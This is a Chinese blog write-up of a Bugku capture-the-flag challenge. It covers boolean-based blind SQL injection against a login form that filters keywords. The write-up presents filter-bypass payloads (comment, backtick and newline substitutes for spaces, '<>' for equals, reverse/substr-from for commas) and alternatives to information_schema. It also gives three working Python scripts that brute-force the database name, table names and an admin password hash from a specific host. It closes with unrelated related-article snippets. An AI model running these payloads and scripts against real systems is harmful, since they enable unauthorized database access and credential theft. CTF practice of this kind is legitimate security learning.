Bugku sql注入 基于布尔的SQL盲注 经典题where information过滤

目录

绕过空格

/**/绕过

()绕过

回车绕过

·(键按钮)绕过

等号绕过

绕过,(逗号)使用substr

下面存在基本绕过方式

注释符绕过

/**/绕过

#绕过

/*注释内容*/绕过

//注释绕过

大小写绕过

绕过information过滤

简单的爆破表名



 

bugku基于布尔的SQL盲注_bugku 基于布尔的sql盲注-CSDN博客 

考核中遇到的题 爆出数据库 就完全不知道怎么做了

这里拿到原题记录一下

首先拿到登入界面我们来进行测试

输入 admin 密码随便输入

输入 admin123 密码随便输入

发现了 这里admin是存在数据库中的 但是不存在就会回显不存在

所以这里我们可以确定了 admin 是true的

然后我们开始fuzz

 发现过滤了巨多。。。。。where information啥都是过滤

然后我们一个一个绕过

绕过空格

/**/绕过

select/**/*/**/from/**/username

()绕过

select(*)from(username)

回车绕过

因为mysql只有在遇到; 才会执行
所以我们可以通过 %0a绕过select%0a*%0afrom%0ausername

·(键按钮)绕过

select`*`from`username`

这里存在许多的绕过方式

下面是等号的绕过

等号绕过

这里我们可以使用<>绕过等号

<>是不等号的意思所以我们可以通过<>来构造
a'or(1<>2)# 这里回显是 1 因为1不等于2 并且admin存在a’or(1<>1)# 这里回显是 0 因为1等于1

目前我们可以开始爆破数据库了

我们可以知道构造payload

a'or(ascii(substr(database()),0,1)<>1)#

但是我们发现 这里被过滤了 因为 , 被过滤

所以我们无法使用这个方法

绕过,(逗号)使用substr

这里我们学习到一种方式

substr('flag' from 1)
SELECT substr('flag' from 1)  --->flagSELECT substr('flag' from 2)  --->lagSELECT substr('flag' from 3)  --->agSELECT substr('flag' from 4)  --->g

但是我们这里发现 我们无法通过 1 搜索到flag后然后查询

我们可以使用倒装输出看看 reverse

SELECT substr((reverse(substr('flag' FROM 1)))FROM 4)fSELECT substr((reverse(substr('flag' FROM 2)))FROM 3)lSELECT substr((reverse(substr('flag' FROM 3)))FROM 2)aSELECT substr((reverse(substr('flag' FROM 4)))FROM 1)g

实现了读取

这里我们就可以进行payload拼接

a'or(ord(substr((reverse(substr((database())from(2))))from(8)))<>98)#

我们再来分析一下

a'or(ord(substr((reverse(substr((database())from(1))))from(8)))<>1)#内容其实是a' or ord(substr(reverse(substr(database() from 1)) from 1))<>1我们首先通过substr(database() from 1) 来输出但是这个时候是返回全部内容 假如database为admin
那么这个时候回显是admin我们使用倒装reverse(substr(database() from 1))返回的是 nimda这个时候我们访问最大的值这里是5substr(reverse(substr(database() from 1)) from 5)就返回了 a我们就获取了第一个字符的内容这里为什么要使用ord呢 因为ascii在mysql中 大小写的 编码是一样的 's'='S'

所以我们开始写python代码

import requests
import string,hashlib
import time
url = 'http://114.67.175.224:13436/'
string1 = string.digits + (string.ascii_lowercase)
password = ''
for i in range(1,8):for j in range(8,0,-1):for k in range(48, 128):payload = """a'or(ord(substr((reverse(substr((database())from({0}))))from({1})))<>{2})#""".format(i, j, k)data = {'username':payload,'password':'abcd'}try:res = requests.post(url, data=data, timeout=5)except:time.sleep(2)res = requests.post(url, data=data, timeout=5)if 'username does not exist' in res.text:password += chr(k)print(password)breakres.close()

获取了数据库名称  blindsql

但是我们继续进行的时候就发现了 无法继续

因为过滤了 information where 等

下面存在基本绕过方式

注释符绕过

这里的原理是 注释符后的会被执行

/**/绕过

select * from users /**/ where id = 1 

#绕过

select * from users # where id = 1 

/*注释内容*/绕过

select * from users /* where id = 1 */

//注释绕过

select * from users // where id = 1 

大小写绕过

如果waf对大小写不敏感我们就可以使用这个

sElEct  * from users whErE id = 1 union sElEct 1,2,3

绕过information过滤

sys.schema_auto_increment_columnssys.schema_table_statistics_with_buffersys.x$schema_table_statistics_with_buffersys.x$schema_table_statisticssys.x$ps_schema_table_statistics_iomysql.innodb_table_statsmysql.innodb_index_stats

但是在这之前我们先需要看看我们的version是什么

修改上面的payload

payload = """a'or(ord(substr((reverse(substr((version())from({0}))))from({1})))<>{2})#""".format(i, j, k)

所以上面都不能用。。。。

简单的爆破表名

这里我们就开始思考能不能爆破

这里介绍两个

a' or exists(select * from user)#这里如果返回true 就说明 user存在a'or admin.test is null  这里返回true 说明不存在

但是这两个都不能用 因为全过滤了

这里我们就开始犯了难了

这里我们可以使用另一个爆破方法

a'or(length((select(group_concat(flag))from(blindsql.test)))>0)#这里的test和flag是我们需要替换到字典中的内容的这里其实就是真的纯纯爆破
import requests
import sysurl = 'http://114.67.175.224:13436/'
res = '爆破了'
shuzi = 1
#读取字典
file = open(r'C:\Users\Administrator\Desktop\攻防\渗透\字典\密码\Top50.txt','r')
lines = file.readlines()
file.close()
lines = [line.rstrip() for line in lines]
for line in lines:for line2 in lines:paylaod = """a'or(length((select(group_concat({0}))from(blindsql.{1})))>0)#""".format(line2,line)print(paylaod)data = {'username':paylaod,'password':'asdba'}responce = requests.post(url=url,data=data)shuzi +=1if "password error!" in responce.text:print("爆破结束----爆破了"+str(shuzi)+"次")print(paylaod)print("表名为:"+line)print("字段名为:"+line2)sys.exit()

但是这里确实没有字典 我也没有找到字典能够爆破

然后我们直接进行读取即可

a'or(ord(substr(reverse(substr((select(group_concat(password))from(blindsql.admin))from(1)))from(32)))<>52)#

 

import requests
import string,hashlib
import time
url = 'http://114.67.175.224:18038/'
string1 = string.digits + (string.ascii_lowercase)
password = ''
for i in range(1,40):for j in range(40,0,-1):for k in range(48, 128):payload = """a'or(ord(substr(reverse(substr((select(group_concat(password))from(blindsql.admin))from({0})))from({1})))<>{2})#""".format(i, j, k)data = {'username':payload,'password':'abcd'}try:res = requests.post(url, data=data, timeout=5)except:time.sleep(2)res = requests.post(url, data=data, timeout=5)if 'username does not exist!' in res.text:password += chr(k)print(password)breakres.close()

4dcc88f8f1bc05e7c2ad1a60288481a2

但是确实这个爆破太慢了

我这里再介绍另一个方法

a'or((ascii(substr((select(password))from(1)))-48))--这里其实最主要就是ascii 和 -48-48 是 减去48就是我们查询到passaword的首字母 如果为48 即 1 就输出 0 那么整体输出0如果不为48 就输出1 整体就为1这里不需要使用倒装因为ascii(substr((select(password))from(1)这里只需要修改 1 2 3 就可以获取这个首字符的ascii

所以我们开始构造

import requests
import string,hashlib
import time
url = 'http://114.67.175.224:18038/'
string1 = string.digits + (string.ascii_lowercase)
password = ''
for i in range(1,40):for k in range(48, 128):payload = """a'or((ascii(substr((select(password))from({0})))-{1}))#""".format(i,k)data = {'username':payload,'password':'abcd'}try:res = requests.post(url, data=data, timeout=5)except:time.sleep(2)res = requests.post(url, data=data, timeout=5)if 'username does not exist!' in res.text:password += chr(k)print(password)breakres.close()

速度确实快了很多

然后我们登入即可

 

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.rhkb.cn/news/159970.html

如若内容造成侵权/违法违规/事实不符,请联系长河编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

14-k8s-基本存储之EmptyDir、HostPath、NFS

文章目录 一、相关概念二、EmptyDir存储三、HostPath存储四、NFS存储 一、相关概念 概述 Volumn定义在Pod上&#xff0c;然后被该Pod里面的多个容器挂载到具体的文件目录下。实现同一个Pod中不同容器之间的数据共享以及数据的持久化存储。Volume的生命周期不和Pod中的单个容器的…

MySQL逻辑架构

文章目录 逻辑架构剖析1. 连接层2. 服务层3. 引擎层4. 存储层 SQL执行流程1. MySQL中的 SQL执行流程&#xff08;理论&#xff09;2. MySQL8中的 SQL 执行流程&#xff08;实践&#xff09;确认profiling 是否开启多次执行相同SQL查询查看profiles查看profile 3. SQL语法顺序 数…

MFC-对话框

目录 1、模态和非模态对话框&#xff1a; &#xff08;1&#xff09;、对话框的创建 &#xff08;2&#xff09;、更改默认的对话框名称 &#xff08;3&#xff09;、创建模态对话框 1&#xff09;、创建按钮跳转的界面 2&#xff09;、在跳转的窗口添加类 3&#xff0…

Ceph 中的写入放大

新钛云服已累计为您分享769篇技术干货 介绍 Ceph 是一个开源的分布式存储系统&#xff0c;设计初衷是提供较好的性能、可靠性和可扩展性。 Ceph 独一无二地在一个统一的系统中同时提供了对象、块、和文件存储功能。 Ceph 消除了对系统单一中心节点的依赖&#xff0c;实现了无中…

Android自定义AppGlideModule,DataFetcher ,ModelLoaderFactory,ModelLoader,Kotlin(1)

Android自定义AppGlideModule,DataFetcher ,ModelLoaderFactory,ModelLoader,Kotlin(1) 假设实现一个简单的功能&#xff0c;对传入要加载的path路径增加一定的筛选、容错或“重定向”&#xff0c;需要自定义一个模型&#xff0c;基于这个模型&#xff0c;让Glide自动匹配模型…

C++前缀和算法:构造乘积矩阵

基础知识点 C算法&#xff1a;前缀和基础 题目 给你一个下标从 0 开始、大小为 n * m 的二维整数矩阵 grid &#xff0c;定义一个下标从 0 开始、大小为 n * m 的的二维矩阵 p。如果满足以下条件&#xff0c;则称 p 为 grid 的 乘积矩阵 &#xff1a; 对于每个元素 p[i][j] …

Redis HyperLogLog的使用

Redis HyperLogLog知识总结 一、简介二、使用 一、简介 Redis HyperLogLog是一种数据结构&#xff0c;用于高效地计算基数&#xff08;集合中唯一元素的数量&#xff09;。它的主要作用是用于在内存中高效地存储和计算大量数据的基数&#xff0c;而无需完全存储所有的数据。Hy…

CICD:Circle CI 实现CICD

持续集成解决什么问题 提高软件质量效率迭代便捷部署快速交付、便于管理 持续集成&#xff08;CI&#xff09; 集成&#xff0c;就是一些孤立的事物或元素通过某种方式集中在一起&#xff0c;产生联系&#xff0c;从而构建一个有机整体的过程。 持续&#xff0c;就是指长期…

BIM轻量化技术简介

BIM轻量化技术是指在工程建筑的BIM模型建立之后&#xff08;利用专业的BIM建模软件&#xff0c;比如Autodesk Revit, Bentley MicroStation, DS Catia等&#xff09;&#xff0c;通过对BIM模型的压缩处理等技术手段&#xff0c;让BIM可以在各类WEB浏览器、移动App上被使用的技术…

[架构之路-237]:目标系统 - 纵向分层 - 网络通信 - DNS的递归查询和迭代查询

目录 一、DNS协议与DNS系统架构 1.1 什么是DNS协议 1.2 为什么需要DNS协议 1.3 DNS系统架构 二、DNS系统的查询方式 2.1 递归与迭代的比较 2.2 DNS递归查询 2.3 DNS迭代查询 一、DNS协议与DNS系统架构 1.1 什么是DNS协议 DNS&#xff08;Domain Name System&#xff…

2.3 初探Hadoop世界

文章目录 零、学习目标一、导入新课二、新课讲解&#xff08;一&#xff09;Hadoop的前世今生1、Google处理大数据三大技术2、Hadoop如何诞生3、Hadoop主要发展历程 &#xff08;二&#xff09;Hadoop的优势1、扩容能力强2、成本低3、高效率4、可靠性5、高容错性 &#xff08;三…

数据分析案例-基于snownlp模型的MatePad11产品用户评论情感分析(文末送书)

&#x1f935;‍♂️ 个人主页&#xff1a;艾派森的个人主页 ✍&#x1f3fb;作者简介&#xff1a;Python学习者 &#x1f40b; 希望大家多多支持&#xff0c;我们一起进步&#xff01;&#x1f604; 如果文章对你有帮助的话&#xff0c; 欢迎评论 &#x1f4ac;点赞&#x1f4…

Android 14 正式发布,已经在 AOSP 中上线

本心、输入输出、结果 文章目录 Android 14 正式发布,已经在 AOSP 中上线前言总结主要更新内容机型支持优化性能的数据体现字体放大、多媒体支持加强Android 14 增加了对 10 位高动态范围 (HDR) 图像的支持提供了新的图形和尺寸管理用户体验 与隐私安全弘扬爱国精神Android 14…

nvm、node、npm解决问题过程记录

在Windows10如何降级Node.js版本&#xff1a;可以尝试将Node.js版本降级到一个较旧的版本&#xff0c;以查看问题是否得以解决。可以使用Node Version Manager (nvm) 来轻松切换Node.js版本&#xff0c;具体完整步骤&#xff1a; 首先&#xff0c;需要安装Node Version Manager…

leetcode-62.不同路径

1. 题目 2. 解答 dp[i][j]表示机器人位于第i&#xff0c;j位置的时候&#xff0c;有多少路径 如果i 0&#xff0c;dp[i][j] 1;如果j 0&#xff0c;dp[i][j] 1;其他情况dp[i][j] dp[i-1][j] dp[i][j - 1] #include <stdio.h>int solve(int m, int n) {int dp[m][…

【python海洋专题二十】subplots_adjust布局调整

上期读取soda&#xff0c;并subplot 但是存在一些不完美&#xff0c;本期修饰 本期内容 subplots_adjust布局调整 1&#xff1a;未调整布局的 2&#xff1a;调整布局 往期推荐 【python海洋专题一】查看数据nc文件的属性并输出属性到txt文件 【python海洋专题二】读取水深…

微信小程序框架---视图层逻辑层API事件

目录 前言 一、小程序框架介绍 1.响应的数据绑定 2.页面管理 3.基础组件 4.丰富的 API 二、视图层 View 1.WXML 数据绑定 列表渲染 条件渲染 模板 2.WXSS 尺寸单位 样式导入 内联样式 选择器 全局样式与局部样式 3.WXS 示例 注意事项 页面渲染 数据处理 …

水滴怕片效果实现

效果展示 CSS 知识点 border-radius 属性运用 FANCY-BORDER-RADIUS 工具 此工具主要是实现不规则的图形。 FANCY-BORDER-RADIUS 工具地址 页面整体布局实现 <div class"container"><div class"drop" style"--clr: #ff0f5b">&l…

Python学习基础笔记六十六——对象的方法

我们已经学习到的对象类型&#xff1a; 整数类型的对象 字符串类型的对象 列表类型的对象 元组类型的对象 对象通常都有属于自己的方法&#xff08;method&#xff09; 调用对象的方法和调用函数差不多&#xff0c;只要在前面加上所属对象的一个点。 var1 [1, 2, 3,4, 5,…

PreScan与MATLAB联合仿真报错

一、 问题&#xff1a; Error:Matlab ||和&&运算符的操作数必须能够转换为逻辑标量值 二、解决办法 必须安装VS2013&#xff08;我装的VS2017不行的&#xff09;&#xff0c;然后重启prescan和MATLAB&#xff0c;编译通过&#xff0c;界面如下&#xff1a; 三、VS…